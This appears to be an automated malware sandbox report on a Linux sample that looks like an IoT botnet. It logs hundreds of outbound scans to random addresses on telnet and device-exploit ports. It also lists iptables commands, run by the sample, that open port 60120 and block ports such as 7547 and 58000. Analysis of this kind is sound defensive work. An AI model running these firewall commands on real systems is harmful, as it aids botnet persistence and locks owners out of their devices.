              Source: global trafficTCP traffic: 192.168.2.20:33782 -> 59.47.52.108:37215
              Source: global trafficTCP traffic: 192.168.2.20:58046 -> 190.114.242.248:49152
              Source: global trafficTCP traffic: 192.168.2.20:45440 -> 142.184.135.34:8443
              Source: global trafficTCP traffic: 192.168.2.20:47166 -> 24.10.221.243:49152
              Source: global trafficTCP traffic: 192.168.2.20:39320 -> 114.19.106.118:37215
              Source: global trafficTCP traffic: 192.168.2.20:43220 -> 37.173.108.182:81
              Source: global trafficTCP traffic: 192.168.2.20:33198 -> 135.248.124.244:8080
              Source: global trafficTCP traffic: 192.168.2.20:42216 -> 74.232.146.139:8080
              Source: global trafficTCP traffic: 192.168.2.20:37460 -> 193.98.148.181:37215
              Source: global trafficTCP traffic: 192.168.2.20:36780 -> 90.142.76.81:8080
              Source: global trafficTCP traffic: 192.168.2.20:56962 -> 25.23.192.39:8443
              Source: global trafficTCP traffic: 192.168.2.20:44442 -> 4.23.193.21:7574
              Source: global trafficTCP traffic: 192.168.2.20:43352 -> 143.226.183.246:8080
              Source: global trafficTCP traffic: 192.168.2.20:35304 -> 125.11.86.219:81
              Source: global trafficTCP traffic: 192.168.2.20:35950 -> 117.139.2.64:8080
              Source: global trafficTCP traffic: 192.168.2.20:57090 -> 158.180.15.87:81
              Source: global trafficTCP traffic: 192.168.2.20:59182 -> 125.232.30.122:52869
              Source: global trafficTCP traffic: 192.168.2.20:56960 -> 64.90.35.78:37215
              Source: global trafficTCP traffic: 192.168.2.20:52400 -> 92.187.181.216:49152
              Source: global trafficTCP traffic: 192.168.2.20:60720 -> 81.36.208.25:37215
              Source: global trafficTCP traffic: 192.168.2.20:50502 -> 119.218.221.67:52869
              Source: global trafficTCP traffic: 192.168.2.20:53688 -> 171.23.120.90:8080
              Source: global trafficTCP traffic: 192.168.2.20:60266 -> 37.76.48.72:5555
              Source: global trafficTCP traffic: 192.168.2.20:38596 -> 79.229.187.191:37215
              Source: global trafficTCP traffic: 192.168.2.20:42990 -> 146.248.14.242:8080
              Source: global trafficTCP traffic: 192.168.2.20:40152 -> 52.248.111.32:7574
              Source: global trafficTCP traffic: 192.168.2.20:45888 -> 198.127.94.178:8080
              Source: global trafficTCP traffic: 192.168.2.20:48972 -> 188.48.235.83:52869
              Source: global trafficTCP traffic: 192.168.2.20:39410 -> 149.24.10.86:5555
              Source: global trafficTCP traffic: 192.168.2.20:55100 -> 152.135.244.87:8080
              Source: global trafficTCP traffic: 192.168.2.20:55312 -> 178.76.140.206:8080
              Source: global trafficTCP traffic: 192.168.2.20:41806 -> 130.40.195.154:81
              Source: global trafficTCP traffic: 192.168.2.20:43102 -> 119.113.24.153:7574
              Source: global trafficTCP traffic: 192.168.2.20:47100 -> 208.213.191.219:8080
              Source: global trafficTCP traffic: 192.168.2.20:45186 -> 206.150.7.5:37215
              Source: global trafficTCP traffic: 192.168.2.20:59398 -> 216.95.211.133:8443
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 117.98.169.106:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 187.174.210.99:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 80.28.25.86:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 206.47.55.60:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 117.15.195.151:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 150.135.224.55:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 84.162.120.168:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 38.187.0.109:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 90.178.36.52:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 83.169.4.66:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 78.25.35.0:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 176.251.107.19:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 166.139.210.202:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 45.255.135.222:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 64.60.156.172:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 170.28.13.241:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 69.148.51.105:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 94.119.137.8:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 78.58.120.106:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 125.31.207.97:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 169.247.212.103:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 86.1.120.215:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 201.145.205.246:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 176.17.112.147:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 180.249.225.38:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 54.126.72.39:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 207.220.37.255:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 156.124.19.178:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 9.119.106.44:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 125.196.149.212:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 218.52.94.240:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 206.22.158.92:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 149.165.201.122:2323
              Source: global trafficTCP traffic: 192.168.2.20:36286 -> 151.235.98.188:52869
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 70.142.209.180:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 19.67.205.237:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 67.232.197.142:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 145.214.33.95:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 161.26.89.62:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 62.190.128.79:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 197.86.174.173:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 114.99.17.241:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 189.179.160.80:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 91.223.186.181:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 34.126.231.244:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 57.97.159.30:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 74.34.224.22:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 164.100.155.219:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 115.145.169.30:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 77.206.48.106:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 102.86.201.96:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 23.66.190.127:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 171.82.232.134:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 23.134.142.150:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 76.120.94.75:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 126.39.183.239:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 204.15.252.204:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 60.19.190.113:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 24.111.17.40:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 180.58.196.188:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 23.141.250.44:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 221.104.222.102:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 174.231.155.97:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 13.111.18.70:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 18.132.143.23:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 207.221.231.94:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 74.156.135.124:2323
              Source: global trafficTCP traffic: 192.168.2.20:32832 -> 72.116.52.243:8443
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 195.182.237.244:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 157.9.213.184:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 156.149.46.74:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 175.243.55.238:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 181.229.246.160:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 173.96.113.131:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 211.160.156.9:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 200.233.160.240:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 96.150.185.206:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 2.223.160.174:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 109.168.201.230:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 98.110.180.156:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 188.182.24.215:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 202.100.225.66:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 108.80.251.155:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 188.151.208.67:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 67.136.137.120:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 178.127.63.205:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 72.252.87.71:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 63.205.40.16:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 79.115.27.234:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 35.64.204.253:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 209.143.238.124:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 82.92.199.247:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 115.122.10.41:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 200.79.154.190:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 66.226.192.6:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 179.52.72.165:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 178.106.158.1:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 152.75.61.215:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 99.146.105.31:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 153.48.151.95:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 203.122.112.94:2323
              Source: global trafficTCP traffic: 192.168.2.20:59544 -> 157.20.10.149:81
              Source: global trafficTCP traffic: 192.168.2.20:42124 -> 63.188.189.233:8443
              Source: global trafficTCP traffic: 192.168.2.20:43584 -> 62.238.173.138:7574
              Source: global trafficTCP traffic: 192.168.2.20:39864 -> 102.217.189.148:8080
              Source: global trafficTCP traffic: 192.168.2.20:58152 -> 198.152.181.234:49152
              Source: global trafficTCP traffic: 192.168.2.20:48704 -> 20.154.149.216:8080
              Source: global trafficTCP traffic: 192.168.2.20:57762 -> 50.172.44.166:8443
              Source: global trafficTCP traffic: 192.168.2.20:32842 -> 44.207.80.65:8080
              Source: global trafficTCP traffic: 192.168.2.20:57258 -> 43.161.129.170:8080
              Source: global trafficTCP traffic: 192.168.2.20:35344 -> 16.216.117.103:7574
              Source: global trafficTCP traffic: 192.168.2.20:56296 -> 48.111.167.94:49152
              Source: global trafficTCP traffic: 192.168.2.20:44748 -> 21.44.246.61:49152
              Source: global trafficTCP traffic: 192.168.2.20:43884 -> 211.98.118.186:81
              Source: global trafficTCP traffic: 192.168.2.20:44378 -> 67.213.164.194:8080
              Source: global trafficTCP traffic: 192.168.2.20:51006 -> 73.168.42.71:8080
              Source: global trafficTCP traffic: 192.168.2.20:36092 -> 207.45.206.85:37215
              Source: global trafficTCP traffic: 192.168.2.20:35316 -> 38.115.189.82:8080
              Source: global trafficTCP traffic: 192.168.2.20:36154 -> 8.196.85.46:8080
              Source: global trafficTCP traffic: 192.168.2.20:52714 -> 169.231.254.119:5555
              Source: global trafficTCP traffic: 192.168.2.20:37056 -> 189.25.210.17:8443
              Source: global trafficTCP traffic: 192.168.2.20:56744 -> 102.162.109.251:81
              Source: global trafficTCP traffic: 192.168.2.20:53314 -> 93.118.156.27:37215
              Source: global trafficTCP traffic: 192.168.2.20:33544 -> 156.30.203.234:8443
              Source: global trafficTCP traffic: 192.168.2.20:37616 -> 96.227.71.31:8080
              Source: global trafficTCP traffic: 192.168.2.20:55648 -> 91.23.94.89:8080
              Source: global trafficTCP traffic: 192.168.2.20:38442 -> 43.30.240.136:8443
              Source: global trafficTCP traffic: 192.168.2.20:44360 -> 114.15.113.65:8080
              Source: global trafficTCP traffic: 192.168.2.20:35250 -> 126.165.195.44:8080
              Source: global trafficTCP traffic: 192.168.2.20:43476 -> 168.152.12.184:49152
              Source: global trafficTCP traffic: 192.168.2.20:42328 -> 185.198.59.136:7574
              Source: global trafficTCP traffic: 192.168.2.20:41498 -> 63.191.13.133:8080
              Source: global trafficTCP traffic: 192.168.2.20:52652 -> 139.249.198.163:5555
              Source: global trafficTCP traffic: 192.168.2.20:50270 -> 22.122.201.176:8080
              Source: global trafficTCP traffic: 192.168.2.20:33924 -> 159.133.144.14:8080
              Source: global trafficTCP traffic: 192.168.2.20:36110 -> 183.43.207.246:37215
              Source: global trafficTCP traffic: 192.168.2.20:49440 -> 22.142.197.254:49152
              Source: global trafficTCP traffic: 192.168.2.20:36466 -> 205.119.206.192:7574
              Source: global trafficTCP traffic: 192.168.2.20:58704 -> 74.5.113.71:7574
              Source: global trafficTCP traffic: 192.168.2.20:56056 -> 191.137.127.161:8443
              Source: global trafficTCP traffic: 192.168.2.20:47620 -> 67.96.246.134:5555
              Source: global trafficTCP traffic: 192.168.2.20:51942 -> 85.217.68.43:49152
              Source: global trafficTCP traffic: 192.168.2.20:32816 -> 117.25.227.147:8443
              Source: global trafficTCP traffic: 192.168.2.20:58336 -> 83.113.163.141:37215
              Source: global trafficTCP traffic: 192.168.2.20:60880 -> 95.68.187.209:8443
              Source: global trafficTCP traffic: 192.168.2.20:56160 -> 105.205.64.147:52869
              Source: global trafficTCP traffic: 192.168.2.20:36858 -> 89.129.131.73:8080
              Source: global trafficTCP traffic: 192.168.2.20:53906 -> 150.211.192.100:37215
              Source: global trafficTCP traffic: 192.168.2.20:34958 -> 155.238.66.118:49152
              Source: global trafficTCP traffic: 192.168.2.20:57126 -> 31.57.44.152:37215
              Source: global trafficTCP traffic: 192.168.2.20:59494 -> 178.149.93.21:8080
              Source: global trafficTCP traffic: 192.168.2.20:40610 -> 169.5.83.203:7574
              Source: global trafficTCP traffic: 192.168.2.20:48244 -> 48.145.15.35:7574
              Source: global trafficTCP traffic: 192.168.2.20:49132 -> 161.96.234.20:37215
              Source: global trafficTCP traffic: 192.168.2.20:57092 -> 202.72.100.208:52869
              Source: global trafficTCP traffic: 192.168.2.20:47052 -> 198.134.133.19:52869
              Source: global trafficTCP traffic: 192.168.2.20:43012 -> 6.37.90.74:37215
              Source: global trafficTCP traffic: 192.168.2.20:33624 -> 92.103.103.47:37215
              Source: global trafficTCP traffic: 192.168.2.20:60776 -> 19.61.113.43:7574
              Source: global trafficTCP traffic: 192.168.2.20:40486 -> 99.181.137.45:8080
              Source: global trafficTCP traffic: 192.168.2.20:37512 -> 171.192.201.93:52869
              Source: global trafficTCP traffic: 192.168.2.20:33650 -> 88.153.234.30:8080
              Source: global trafficTCP traffic: 192.168.2.20:33378 -> 184.151.108.119:8080
              Source: global trafficTCP traffic: 192.168.2.20:52078 -> 37.38.172.114:37215
              Source: global trafficTCP traffic: 192.168.2.20:55364 -> 3.55.225.207:5555
              Source: global trafficTCP traffic: 192.168.2.20:44412 -> 53.253.84.232:5555
              Source: global trafficTCP traffic: 192.168.2.20:48418 -> 166.130.48.19:5555
              Source: global trafficTCP traffic: 192.168.2.20:36482 -> 28.244.244.163:37215
              Source: global trafficTCP traffic: 192.168.2.20:59618 -> 113.161.190.188:52869
              Source: global trafficTCP traffic: 192.168.2.20:50044 -> 118.143.200.102:8080
              Source: global trafficTCP traffic: 192.168.2.20:47252 -> 46.177.88.163:8080
              Source: global trafficTCP traffic: 192.168.2.20:49984 -> 157.228.242.122:81
              Source: global trafficTCP traffic: 192.168.2.20:53300 -> 20.149.201.53:8080
              Source: global trafficTCP traffic: 192.168.2.20:58690 -> 198.225.2.23:49152
              Source: global trafficTCP traffic: 192.168.2.20:45076 -> 160.64.230.81:52869
              Source: global trafficTCP traffic: 192.168.2.20:51264 -> 139.159.32.150:8443
              Source: global trafficTCP traffic: 192.168.2.20:46258 -> 74.35.20.129:81
              Source: global trafficTCP traffic: 192.168.2.20:43480 -> 170.150.75.145:81
              Source: global trafficTCP traffic: 192.168.2.20:60366 -> 209.185.236.134:81
              Source: global trafficTCP traffic: 192.168.2.20:41370 -> 154.210.234.104:8080
              Source: global trafficTCP traffic: 192.168.2.20:59728 -> 50.48.206.45:7574
              Source: global trafficTCP traffic: 192.168.2.20:58308 -> 18.73.233.15:8443
              Source: global trafficTCP traffic: 192.168.2.20:35666 -> 216.193.98.28:8443
              Source: global trafficTCP traffic: 192.168.2.20:47722 -> 8.195.111.22:5555
              Source: global trafficTCP traffic: 192.168.2.20:44058 -> 57.53.105.210:52869
              Source: global trafficTCP traffic: 192.168.2.20:54806 -> 152.234.42.42:37215
              Source: global trafficTCP traffic: 192.168.2.20:48540 -> 220.165.10.156:8080
              Source: global trafficTCP traffic: 192.168.2.20:40736 -> 175.10.248.75:8080
              Source: global trafficTCP traffic: 192.168.2.20:37594 -> 124.244.15.23:8080
              Source: global trafficTCP traffic: 192.168.2.20:55900 -> 219.224.59.244:52869
              Source: global trafficTCP traffic: 192.168.2.20:37038 -> 132.70.142.5:81
              Source: global trafficTCP traffic: 192.168.2.20:56930 -> 34.188.48.201:8080
              Source: global trafficTCP traffic: 192.168.2.20:46906 -> 115.16.10.21:49152
              Source: global trafficTCP traffic: 192.168.2.20:50726 -> 58.177.55.29:8080
              Source: global trafficTCP traffic: 192.168.2.20:49846 -> 63.153.103.58:8080
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 220.81.142.179:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 218.237.227.44:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 221.197.159.218:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 99.70.134.35:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 204.122.188.208:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 212.226.50.190:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 90.192.99.77:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 92.82.131.177:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 184.104.186.255:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 80.254.91.193:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 83.101.129.190:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 150.65.96.123:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 13.28.70.135:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 98.124.110.124:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 180.54.149.225:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 71.97.182.98:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 103.221.97.223:2323
              Source: global trafficTCP traffic: 192.168.2.20:52662 -> 19.234.87.63:8080
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 145.239.19.214:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 114.2.64.142:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 130.221.2.128:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 169.240.120.21:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 4.225.63.171:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 171.88.94.59:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 12.149.196.84:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 110.105.251.231:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 36.251.209.137:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 136.242.26.58:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 80.170.60.151:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 110.76.95.204:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 67.181.53.78:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 169.238.12.52:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 163.191.185.236:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 118.202.243.49:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 94.171.188.7:2323
              Source: global trafficTCP traffic: 192.168.2.20:53980 -> 208.121.15.128:5555
              Source: global trafficTCP traffic: 192.168.2.20:50642 -> 122.143.33.15:37215
              Source: global trafficTCP traffic: 192.168.2.20:36584 -> 44.186.214.45:8080
              Source: global trafficTCP traffic: 192.168.2.20:38480 -> 31.94.18.17:8080
              Source: global trafficTCP traffic: 192.168.2.20:41372 -> 149.223.98.215:8443
              Source: global trafficTCP traffic: 192.168.2.20:34480 -> 173.136.33.68:8443
              Source: global trafficTCP traffic: 192.168.2.20:58924 -> 96.60.228.58:5555
              Source: global trafficTCP traffic: 192.168.2.20:59914 -> 101.103.73.125:5555
              Source: global trafficTCP traffic: 192.168.2.20:32820 -> 58.160.77.79:5555
              Source: global trafficTCP traffic: 192.168.2.20:35174 -> 55.187.169.167:5555
              Source: global trafficTCP traffic: 192.168.2.20:42894 -> 169.8.56.140:5555
              Source: global trafficTCP traffic: 192.168.2.20:59034 -> 95.195.140.113:8443
              Source: global trafficTCP traffic: 192.168.2.20:47696 -> 204.31.115.147:8080
              Source: global trafficTCP traffic: 192.168.2.20:59066 -> 40.138.183.204:8080
              Source: global trafficTCP traffic: 192.168.2.20:51500 -> 154.57.107.198:49152
              Source: global trafficTCP traffic: 192.168.2.20:55828 -> 19.76.200.46:49152
              Source: global trafficTCP traffic: 192.168.2.20:49682 -> 122.101.90.140:81
              Source: global trafficTCP traffic: 192.168.2.20:51458 -> 87.162.119.140:37215
              Source: global trafficTCP traffic: 192.168.2.20:33784 -> 176.181.32.218:8080
              Source: global trafficTCP traffic: 192.168.2.20:36488 -> 194.160.179.117:37215
              Source: global trafficTCP traffic: 192.168.2.20:35776 -> 168.222.225.0:49152
              Source: global trafficTCP traffic: 192.168.2.20:41830 -> 55.141.32.238:8080
              Source: global trafficTCP traffic: 192.168.2.20:48042 -> 153.116.121.166:81
              Source: global trafficTCP traffic: 192.168.2.20:38162 -> 122.134.129.152:8443
              Source: global trafficTCP traffic: 192.168.2.20:52448 -> 186.91.75.186:7574
              Source: global trafficTCP traffic: 192.168.2.20:37012 -> 49.143.93.65:52869
              Source: global trafficTCP traffic: 192.168.2.20:56254 -> 50.31.248.176:5555
              Source: global trafficTCP traffic: 192.168.2.20:46686 -> 22.31.234.115:8080
              Source: global trafficTCP traffic: 192.168.2.20:45678 -> 39.179.29.20:37215
              Source: global trafficTCP traffic: 192.168.2.20:34350 -> 177.203.121.240:8080
              Source: global trafficTCP traffic: 192.168.2.20:48980 -> 53.110.221.193:49152
              Source: global trafficTCP traffic: 192.168.2.20:49152 -> 143.43.201.31:7574
              Source: global trafficTCP traffic: 192.168.2.20:46992 -> 42.124.198.47:52869
              Source: global trafficTCP traffic: 192.168.2.20:51302 -> 68.103.167.2:49152
              Source: global trafficTCP traffic: 192.168.2.20:58110 -> 45.46.146.31:8080
              Source: global trafficTCP traffic: 192.168.2.20:40950 -> 44.114.159.0:8080
              Source: global trafficTCP traffic: 192.168.2.20:42496 -> 6.179.235.226:8080
              Source: global trafficTCP traffic: 192.168.2.20:44480 -> 203.133.121.10:37215
              Source: global trafficTCP traffic: 192.168.2.20:51428 -> 157.201.127.64:8443
              Source: global trafficTCP traffic: 192.168.2.20:38854 -> 74.86.38.158:49152
              Source: global trafficTCP traffic: 192.168.2.20:60592 -> 14.247.219.102:37215
              Source: global trafficTCP traffic: 192.168.2.20:46030 -> 70.95.221.241:8080
              Source: global trafficTCP traffic: 192.168.2.20:59406 -> 208.150.175.68:49152
              Source: global trafficTCP traffic: 192.168.2.20:55114 -> 160.12.55.21:8080
              Source: global trafficTCP traffic: 192.168.2.20:42936 -> 134.147.43.174:8443
              Source: global trafficTCP traffic: 192.168.2.20:52754 -> 40.118.219.24:8080
              Source: global trafficTCP traffic: 192.168.2.20:41908 -> 63.12.57.100:8080
              Source: global trafficTCP traffic: 192.168.2.20:56264 -> 74.98.122.143:8080
              Source: global trafficTCP traffic: 192.168.2.20:39558 -> 202.157.106.25:8080
              Source: global trafficTCP traffic: 192.168.2.20:56204 -> 159.153.119.69:8080
              Source: global trafficTCP traffic: 192.168.2.20:51496 -> 84.27.204.184:8080
              Source: global trafficTCP traffic: 192.168.2.20:50812 -> 152.15.88.72:8443
              Source: global trafficTCP traffic: 192.168.2.20:60200 -> 33.177.217.109:8080
              Source: global trafficTCP traffic: 192.168.2.20:51190 -> 11.100.127.8:5555
              Source: global trafficTCP traffic: 192.168.2.20:52832 -> 126.130.202.154:8080
              Source: global trafficTCP traffic: 192.168.2.20:35870 -> 2.9.169.104:8443
              Source: global trafficTCP traffic: 192.168.2.20:59600 -> 171.146.122.140:8443
              Source: global trafficTCP traffic: 192.168.2.20:35460 -> 98.66.36.94:8080
              Source: global trafficTCP traffic: 192.168.2.20:43902 -> 12.24.80.216:7574
              Source: global trafficTCP traffic: 192.168.2.20:34406 -> 16.194.20.156:8080
              Source: global trafficTCP traffic: 192.168.2.20:36742 -> 109.93.120.96:8080
              Source: global trafficTCP traffic: 192.168.2.20:59882 -> 219.181.14.154:81
              Source: /bin/sh (PID: 4638)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4670)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4674)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4718)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4737)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4747)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4772)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4793)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4813)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4816)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4825)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4847)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4895)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4918)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4945)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 4966)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 4985)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 5004)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 5022)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 5042)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 5060)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 5079)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 5097)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
